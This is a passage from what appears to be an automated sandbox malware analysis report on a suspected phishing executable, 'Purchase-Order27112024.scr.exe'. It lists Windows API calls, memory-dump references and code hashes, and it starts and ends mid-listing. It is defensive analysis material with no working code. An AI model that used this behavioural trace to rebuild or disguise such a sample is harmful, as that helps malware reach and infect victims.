                                                                                                      • Opcode Fuzzy Hash: d90697731e015edeca4d4b1817c2a611af8fdf1ba77c6726d27be154a120642f
                                                                                                      • Instruction Fuzzy Hash: 80F04FF55646409FE624DAACE6C9C46BBDDFB093313920885FC89E7500CA28F8809E54
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                      • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                                                      • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 3700536F
                                                                                                        • Part of subcall function 3700571E: HeapFree.KERNEL32(00000000,00000000,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?), ref: 37005734
                                                                                                        • Part of subcall function 3700571E: GetLastError.KERNEL32(?,?,3700924F,?,00000000,?,00000000,?,37009276,?,00000007,?,?,37007E5A,?,?), ref: 37005746
                                                                                                      • _free.LIBCMT ref: 37005381
                                                                                                      • _free.LIBCMT ref: 37005394
                                                                                                      • _free.LIBCMT ref: 370053A5
                                                                                                      • _free.LIBCMT ref: 370053B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 0120d249561b4378308d8d151e897e48356af91bb66e704f4ec264ed349b72de
                                                                                                      • Instruction ID: 49d6428b3335a17e6bfea238a0304b787e2e79791a8809aa5935b7151f4f5acd
                                                                                                      • Opcode Fuzzy Hash: 0120d249561b4378308d8d151e897e48356af91bb66e704f4ec264ed349b72de
                                                                                                      • Instruction Fuzzy Hash: BFF0B7FC894524DFDA019B7CAA96808BFF5E71CA70353018AFC14A7360DB3D4543AE85
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,00000104), ref: 37004C1D
                                                                                                      • _free.LIBCMT ref: 37004CE8
                                                                                                      • _free.LIBCMT ref: 37004CF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$FileModuleName
                                                                                                      • String ID: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                      • API String ID: 2506810119-1268897370
                                                                                                      • Opcode ID: 50876530528cb9bc9469673ebec7eb3c84266a327e96b060b640588f6ac0af76
                                                                                                      • Instruction ID: 2918cd10c2e5b70fcc42b2464eb826e762419abef37a417a4f4b45c2f9ef9c67
                                                                                                      • Opcode Fuzzy Hash: 50876530528cb9bc9469673ebec7eb3c84266a327e96b060b640588f6ac0af76
                                                                                                      • Instruction Fuzzy Hash: CE314275A40218EFEB11DBA98981E9EBBF9EB89330F1140DAF804A7200D6749A41CF55
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,37006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 37008731
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 370087BA
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 370087CC
                                                                                                      • __freea.LIBCMT ref: 370087D5
                                                                                                        • Part of subcall function 370056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 37005702
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 18b25a70f329e98e74191be11129ac3d2b9b3afc411a7e763e6b033b4092766f
                                                                                                      • Instruction ID: 5d9b49e4c4e8a4086c99f6c602dceeb8e1640c4804bc68a8c8b05de1df29b46e
                                                                                                      • Opcode Fuzzy Hash: 18b25a70f329e98e74191be11129ac3d2b9b3afc411a7e763e6b033b4092766f
                                                                                                      • Instruction Fuzzy Hash: 22319076A0021A9FEB15CF64CC89EAE7BA5EF44330F0141A8EC18E6194E735D991DFA1
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                                                                        • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                      • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$CountTickWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 2146148272-0
                                                                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                      • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1356686001-0
                                                                                                      • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                                                      • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                                                                      APIs
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3751793516-0
                                                                                                      • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                                                      • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                                                                      APIs
                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404258612-0
                                                                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3585118688-0
                                                                                                      • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                                                      • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,37001D66,00000000,00000000,?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue), ref: 37005D13
                                                                                                      • GetLastError.KERNEL32(?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue,3700E190,FlsSetValue,00000000,00000364,?,37005BC8), ref: 37005D1F
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,37005C88,37001D66,00000000,00000000,00000000,?,37005E85,00000006,FlsSetValue,3700E190,FlsSetValue,00000000), ref: 37005D2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3177248105-0
                                                                                                      • Opcode ID: 0304ea26d9ba1dd4718dd72365b2530591608eecde9cf9b95e37366abfafa18d
                                                                                                      • Instruction ID: edb155ca438069ce5a294d5492a31bd5473f9d5b6421b13279cdd41667e3384d
                                                                                                      • Opcode Fuzzy Hash: 0304ea26d9ba1dd4718dd72365b2530591608eecde9cf9b95e37366abfafa18d
                                                                                                      • Instruction Fuzzy Hash: 3B01D4BA641722ABE3214AA89C4DF5677D8AF057F1B110662F939F7140DB34D802CEE0
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 3700655C
                                                                                                        • Part of subcall function 370062BC: IsProcessorFeaturePresent.KERNEL32(00000017,370062AB,00000000,?,?,?,?,00000016,?,?,370062B8,00000000,00000000,00000000,00000000,00000000), ref: 370062BE
                                                                                                        • Part of subcall function 370062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 370062E0
                                                                                                        • Part of subcall function 370062BC: TerminateProcess.KERNEL32(00000000), ref: 370062E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                      • Instruction ID: 691482129f67cf3ab91e8078f6c637b68e7094c252d4ef82f8c53544a94f6b53
                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                      • Instruction Fuzzy Hash: 6E517275E00219AFEB04CFA8C980BADBBF6FF48374F2581A9D854E7344E6759A018F51
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: : $Se.
                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                      • Instruction ID: abd7af1e2540c9f11069ea5ec487658c652bb6827381410aad560586c2005b36
                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                      • Instruction Fuzzy Hash: F211A376900249AEEB11CFA8D840BDEFBFCEF19224F10409AE545E7252E6745B02CBA5
                                                                                                      APIs
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37002903
                                                                                                        • Part of subcall function 370035D2: RaiseException.KERNEL32(?,?,?,37002925,00000000,00000000,00000000,?,?,?,?,?,37002925,?,370121B8), ref: 37003632
                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 37002920
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3476068407-410509341
                                                                                                      • Opcode ID: 8dce46405ecb2bb32071fe00c1fb2c39e601ed7dddf0fd6bd53b886baa2fdabb
                                                                                                      • Instruction ID: 74289957332358a72edbbf7de29b98cbe93f1f801293d27f7dafbb7ed65d5758
                                                                                                      • Opcode Fuzzy Hash: 8dce46405ecb2bb32071fe00c1fb2c39e601ed7dddf0fd6bd53b886baa2fdabb
                                                                                                      • Instruction Fuzzy Hash: B6F0A47890030C7BBB04E6F5ED449AD77ACAB05670F9041E5E924E2590EF35EA16CE92
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405C01
